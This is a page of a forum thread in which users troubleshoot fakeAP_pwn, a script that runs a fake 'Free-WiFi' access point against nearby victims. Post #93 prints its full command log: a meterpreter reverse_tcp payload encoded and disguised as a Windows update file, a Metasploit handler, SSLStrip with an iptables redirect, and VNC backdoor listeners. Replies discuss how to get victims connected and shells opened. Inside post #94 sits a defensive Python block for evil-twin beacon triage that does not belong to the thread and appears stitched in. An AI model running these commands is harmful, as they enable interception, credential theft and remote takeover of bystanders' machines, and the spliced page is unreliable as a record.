Page 10 of 19 (results 91 to 100 of 185)

Thread: [Script] [Video] FakeAP_pwn (v0.2.1)

  1. #91
    Senior Member
    Join Date
    Jun 2007
    Location
    UK
    Posts
    175

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Does this mean my airbase-ng is broken, or is airbase-ng in general broken?
    If it's mine, can I just re-install airbase-ng?

  2. #92
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by parrotface View Post
    Wifi card = Atheros built into eeepc - driver ath5k
    client XP SP2 HP laptop shows max signal strength
    kernel version 2.6.30.9
    ping 10.0.0.1: 17ms, 7ms, 18ms, 3ms, average 11ms; re-pings average 38ms, 28ms, 3ms
    ping google.co.uk: 83, 47, 50, 63, average 60ms; re-ping average 81, 94, 59ms
    How do I bash fakeAP_pwn.sh -V > output.txt? I ran bash fakeAP_pwn.sh -V > output.txt; something happened when the script ran, but I can't find any file output.txt.
    thanks
    Output should be in the directory you ran the script in. Did you try running it again?

  3. #93
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    2

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Hm... My "victim" doesn't get any IP from the DHCP...

    Injection and monitor mode work on wlan0 and mon0.
    I use an rtl8187-based card, with mac80211.

    Output:
    Code:
    [*] g0tmilk's fakeAP_pwn v0.3-RC12
    [>] Checking environment...
    [i]            ESSID=Free-WiFi
    [i]    fakeAPchannel=6
    [i]        interface=eth0
    [i]    wifiInterface=wlan0
    [i] monitorInterface=mon0
    [i]          payload=vnc
    [i]     backdoorPath=/root/backdoor.exe
    [i]   metasploitPath=/pentest/exploits/framework3
    [i]    htdocs_folder=/var/www/fakeAP_pwn
    [i]              mtu=1800
    [i]      transparent=true
    [i]      respond2All=false
    [i]        fakeAPmac=true
    [i]           extras=false
    [i]            debug=false
    [i]          verbose=2
    [i]        gatewayIP=192.168.32.2
    [i]            ourIP=192.168.32.128
    [i]             port=50981
    [>] Stopping services and programs...
    [i] Command: killall dhcpd3 apache2 airbase-ng wicd-client
    [i] Command: /etc/init.d/dhcp3-server stop
    [i] Command: /etc/init.d/apache2 stop
    [>] Setting up wireless card...
    [i] Command: airmon-ng stop mon0
    [i] Command: ifconfig wlan0 down
    [i] Command: ifconfig wlan0 up
    [i] Command: airmon-ng start wlan0
    [>] Changing MAC Address...
    [i] Command: ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up
    [i]       macAddress=16:8c:9e:65:06:df (unknown)
    [>] Creating scripts...
    [i] Created: /tmp/fakeAP_pwn.rb
    [i] Created: /etc/apache2/sites-available/fakeAP_pwn
    [>] Creating exploit...(Windows)
    [i] Command: /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 R | /pentest/exploits/framework3/msfencode -x /var/www/fakeAP_pwn/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/fakeAP_pwn/Windows-KB183905-x86-ENU.exe
    [>] Creating our fake access point...
    [i] Command: airbase-ng -c 6 -e "Free-WiFi" mon0 -v
    [>] Setting up our end...
    [i] Command: chmod 775 /var/run/
    [i] Command: touch /var/lib/dhcp3/dhcpd.leases
    [>] Starting Metasploit...
    [i] Command: /pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 AutoRunScript=/tmp/fakeAP_pwn.rb E
    [>] Starting SSLStrip...
    [i] Command: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    [i] Command: sslstrip -k -f -l 10000
    [>] Starting DHCP server...
    [i] Command: dhcpd3 -d -f -cf /tmp/fakeAP_pwn.dhcp at0
    [>] Starting Web server...
    [i] Command: /etc/init.d/apache2 start && ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeAP_pwn && /etc/init.d/apache2 reload
    [>] Getting the backdoor (VNC) ready...
    [i] Command: vncviewer -listen
    [>] Forcing target to vist our site...
    [*] Waiting for target to connect...
    
    [>] Cleaning up...
    [i] Command: ls /etc/apache2/sites-available/ | xargs a2dissite fakeAP_pwn && a2ensite default* && /etc/init.d/apache2 reload
    [>] Done! (= Have you... g0tmi1k?
    Any clues?

  4. #94
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by parrotface View Post
    Mine takes about 2 mins; not actually timed it.

    Further testing has shown another problem which I have had previously.
    If I start my attack machine without eth0 connected to my network it fails because eth0 does not have an IP address.
    Now, running "ifconfig eth0 192.168.3.101 netmask 255.255.255.0 broadcast 192.168.3.255" before the script, the script runs.
    I guess this is a fairly simple fix with an if statement: no IP, then ifconfig, etc.
    After downloading and running the update mine took approx 90 seconds to get a meterpreter>
    Thanks for the info!
    I'll look into it!

    Quote Originally Posted by parrotface View Post
    Wifi card = Atheros built into eeepc - driver ath5k
    client XP SP2 HP laptop shows max signal strength
    kernel version 2.6.30.9
    ping 10.0.0.1: 17ms, 7ms, 18ms, 3ms, average 11ms; re-pings average 38ms, 28ms, 3ms
    ping google.co.uk: 83, 47, 50, 63, average 60ms; re-ping average 81, 94, 59ms
    How do I bash fakeAP_pwn.sh -V > output.txt? I ran bash fakeAP_pwn.sh -V > output.txt; something happened when the script ran, but I can't find any file output.txt.
    thanks
    Thanks for the info!
    The output.txt file should be wherever you ran it from...
    If you change it to:
    bash fakeAP_pwn.sh -V > ~/output.txt
    It should go into your user folder.

    Quote Originally Posted by Jelly View Post
    Hm... My "victim" doesn't get any IP from the DHCP...

    Injection and monitor mode work on wlan0 and mon0.
    I use an rtl8187-based card, with mac80211.

    Output:
    Code:
     blah
    Any clues?
    What does it get? 0.0.0.0? 169.x.x.x?
    What is the signal strength?
    What version are you using?
    What is shown in the FakeAP Window? DHCP Window?


    Quote Originally Posted by vvpalin View Post
    Awesome script

    A few quick things I noticed...

    Line 251: the sleep timer needs to be increased just a tad; mine kept failing out at 5 seconds, so I changed it to 10. That could be because I'm in a VM, though.

    Line 261: you might want to change to macchanger -A, as I noticed that a totally random MAC would fail sometimes when boxes tried to connect.

    The last thing really can't be fixed here, but it's totally worth noting. airbase-ng has (at least in my opinion) horrible beacons, meaning any Windows 7 box cannot connect to your fakeAP. It also tends to spew out a TON of beacons with a null SSID, so for instance if you look in Windows zeroconf (or whatever the hell they call it) you'll always see an "Other Network".

    I was kicking around a way to solve this last night, and one of the ideas that I came up with was using a combo of aireplay-ng and packetforge-ng to grep out a beacon from a pcap (or you could make your own), then having an option in airbase-ng to replay your custom beacon.

    Anyways, great script and thanks again
    Thanks for the thanks!
    And thanks for the info/hints! (=
    Personally, my Windows 7 (and XP & Ubuntu box) connects fine to it 95% of the time. Once or twice it has said "other network".
    Saying that, Joker believes airbase-ng is the reason why it's "slow" for some people some of the time, and he's had a few ideas on how to change it! So it's another reason why airbase-ng may not be used in later releases...

    I'm liking the idea of "beacon from a pcap" mind you!




    Thanks for the feedback guys!
    Last edited by g0tmi1k; 07-09-2010 at 12:10 PM.
    Have you...g0tmi1k?
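The script output quoted earlier in the thread shows the fake AP coming up on a macchanger-randomised BSSID, and the post above discusses airbase-ng's null-SSID beacons. From the defender's side those are exactly the signals a wireless IDS triages when it hunts for evil twins. The following Python is an added example written for this page, not code from fakeAP_pwn, aircrack-ng or any of the thread's authors; it assumes beacon observations have already been collected (for instance by a monitor-mode site survey) and that the defender keeps an inventory of authorised BSSIDs and managed ESSIDs. The `Beacon` type, the sample beacons and both inventories are constructed for the example.

```python
"""Rogue / evil-twin AP triage over beacon observations (added example).

Not part of fakeAP_pwn, aircrack-ng or any post in this thread. It assumes
beacons have already been collected by a site survey and that the defender
keeps an inventory of authorised BSSIDs and managed ESSIDs.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Beacon:
    """One observed beacon frame (hypothetical type for this example)."""
    essid: str       # "" for a null/wildcard SSID beacon
    bssid: str       # AP MAC address, colon-separated
    channel: int
    privacy: bool    # True when the beacon advertises encryption


def is_locally_administered(mac: str) -> bool:
    """Bit 1 of the first octet set => locally administered address.

    Vendor-assigned (OUI) MACs have the bit clear; fully randomised MACs of the
    kind macchanger -r produces usually have it set, so an AP beaconing from
    such a BSSID is worth a second look.
    """
    first_octet = int(mac.split(":")[0], 16)
    return bool(first_octet & 0x02)


def triage(beacons, authorised_bssids, managed_essids):
    """Return [(bssid, essid, [reasons])] for every beacon worth investigating.

    managed_essids maps an ESSID the organisation operates to the privacy flag
    its legitimate APs advertise (True = encrypted).
    """
    findings = []
    for b in beacons:
        if b.bssid in authorised_bssids:
            continue                      # known-good AP from inventory
        reasons = []
        if b.essid in managed_essids:
            reasons.append("unknown BSSID advertising a managed ESSID (evil twin?)")
            if managed_essids[b.essid] and not b.privacy:
                reasons.append("open network where encryption is expected")
        if b.essid == "":
            reasons.append("null/wildcard SSID beacon")
        if is_locally_administered(b.bssid):
            reasons.append("locally administered (randomised) BSSID")
        if reasons:
            findings.append((b.bssid, b.essid, reasons))
    return findings


# Constructed sample data for the example.  The 16:8c:9e:65:06:df address is
# the randomised BSSID shown in the script output quoted earlier in the thread.
AUTHORISED_BSSIDS = {"00:1a:2b:3c:4d:5e"}
MANAGED_ESSIDS = {"CorpNet": True}
SAMPLE_BEACONS = [
    Beacon("CorpNet", "00:1a:2b:3c:4d:5e", 6, True),     # legitimate corporate AP
    Beacon("CorpNet", "16:8c:9e:65:06:df", 6, False),    # evil twin: same name, open, random MAC
    Beacon("Free-WiFi", "02:11:22:33:44:55", 6, False),  # open AP on a locally administered MAC
    Beacon("", "02:11:22:33:44:55", 6, False),           # null-SSID beacon from the same radio
    Beacon("Neighbour", "00:aa:bb:cc:dd:ee", 11, True),  # ordinary neighbouring network
]


if __name__ == "__main__":
    for bssid, essid, reasons in triage(SAMPLE_BEACONS, AUTHORISED_BSSIDS, MANAGED_ESSIDS):
        print(f"{bssid} {essid or '<null>'!r}: {'; '.join(reasons)}")
```

On the sample data the corporate AP and the neighbour pass, while the evil twin collects all three reasons (managed ESSID from an unknown BSSID, open where encryption is expected, locally administered MAC) and the random-MAC radio is flagged both for its open "Free-WiFi" beacon and for its null-SSID beacon. The locally-administered check alone is only a heuristic: some legitimate controllers also use LAA BSSIDs, which is why the inventory of authorised BSSIDs takes precedence over every other rule.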

  5. #95
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    2

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by g0tmi1k View Post
    What does it get? 0.0.0.0? 169.x.x.x?
    What is the signal strength?
    What version are you using?
    What is shown in the FakeAP Window? DHCP Window?
    a) It doesn't get anything: DHCP timeout, and then it sets its private IP...
    b) Full strength
    c) Latest fakeAP_pwn v0.3-RC12 (read the first line of the output)
    d) Probes and Join in FakeAP; nothing except the "default" in DHCP (I'll check it later)

  6. #96
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by parrotface View Post
    Does this mean my airbase-ng is broken or airbase-ng in general is broken.
    If it's mine can I just re-install airbase-ng?
    airbase-ng has many bugs; if you have an Atheros card you can try hostAP.
    If you don't have an Atheros card you can use a hardware wireless AP.
    Last edited by joker5bb; 07-09-2010 at 04:23 PM.

  7. #97
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    17

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Another progress report for you... running 0.3-RC10...

    * Your WiFi card + driver = Alfa card, rtl8187
    * Your kernel version = FRESH install of BT4 w/ 2.6.30.9
    * Signal strength of the AP = 100%
    * The time it takes to ping the AP = avg 23 ms
    * The time it takes to ping google.com when connected to the fakeAP = avg 63 ms
    * Output: No errors
    * MTU set to match my card / router at 1500.
    * There is some definite inconsistency with DHCP, although after tweaking I'm successfully dishing out IPs with no problem.
    * The forced website redirection, download link (mirror link only; the update.microsoft.com link times out), and Apache server downloads all work flawlessly on XP.

    As for the exploit, both VNC and SBD are failing for me. It gets to the point of executing the .rb script... below is the output. It never passes this...


    As a note, still no AVs or firewalls on the hosts, and cache/cookies are cleared out before any of my tests. No connection, remote desktop, or remote command line is made. Good luck and great work so far.

    Modifications to 0.3-RC10 - Commented out Line #547
    Code:
    #iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    EDIT (Important) - I believe that I may have found the variable giving people such scattered results with DHCP / Limited Connectivity! I continued some testing with my Windows 7 (x64) box trying to duplicate the results I posted above...
    I've found that using a wireless-N adapter on the VICTIM computer will NOT be able to resolve with the DHCP server. For me, and my guess is many others, the repeated DHCP DISCOVER / DHCP OFFER requests are caused by incompatibility of the wireless-N card trying to connect with your injection/monitor-mode-compatible B/G card which is serving the AP...

    When switching out my wireless-N card for a wireless-B/G card, INSTANT SUCCESS!
    Last edited by kernel831; 07-10-2010 at 07:11 AM.

  8. #98
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by kernel831 View Post
    EDIT (Important) - I believe that I may have found the variable giving people such scattered results with DHCP / Limited Connectivity! I continued some testing with my Windows 7 (x64) box trying to duplicate the results I posted above...
    I've found that ANYONE using a wireless-N adapter on the VICTIM computer will NOT be able to resolve with the DHCP server. For me, and my guess is many others, the repeated DHCP DISCOVER / DHCP OFFER requests are caused by incompatibility of the wireless-N card trying to connect with your injection/monitor-mode-compatible B/G card which is serving the AP...

    When switching out my wireless-N card for a wireless-B/G card, INSTANT SUCCESS!
    Hmmmm, not sure if that's entirely true. It may be in some situations, but in my case my target PC is a Windows 7 x64 PC running a wireless-N card, and it connects to the AP with full connectivity; but it only gains "full connectivity" after selecting one of the options from the annoying pop-up window in 7.


  9. #99
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    17

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by slowz3r View Post
    Hmmmm, not sure if that's entirely true. It may be in some situations, but in my case my target PC is a Windows 7 x64 PC running a wireless-N card, and it connects to the AP with full connectivity; but it only gains "full connectivity" after selecting one of the options from the annoying pop-up window in 7.
    Interesting, I just tested this and came up with the same results I posted earlier, even after changing the ESSID and selecting both home / work network locations on my Win7 (x64) machine. Does the card hosting your AP have wireless-N compatibility (maybe a b/g/n card)?

    Also, the WinXP laptop I've been testing with has a built-in b/g card, which supports the theory as well since it's generally been working on that machine.

  10. #100
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by kernel831 View Post
    Interesting, I just tested this and came up with the same results I posted earlier, even after changing the ESSID and selecting both home / work network locations on my Win7 (x64) machine. Does the card hosting your AP have wireless-N compatibility (maybe a b/g/n card)?

    Also, the WinXP laptop I've been testing with has a built-in b/g card, which supports the theory as well since it's generally been working on that machine.

    Nope, no N capability on my hosting card. What N cards are you connecting with? Mine is a DW1525 in a Dell desktop.

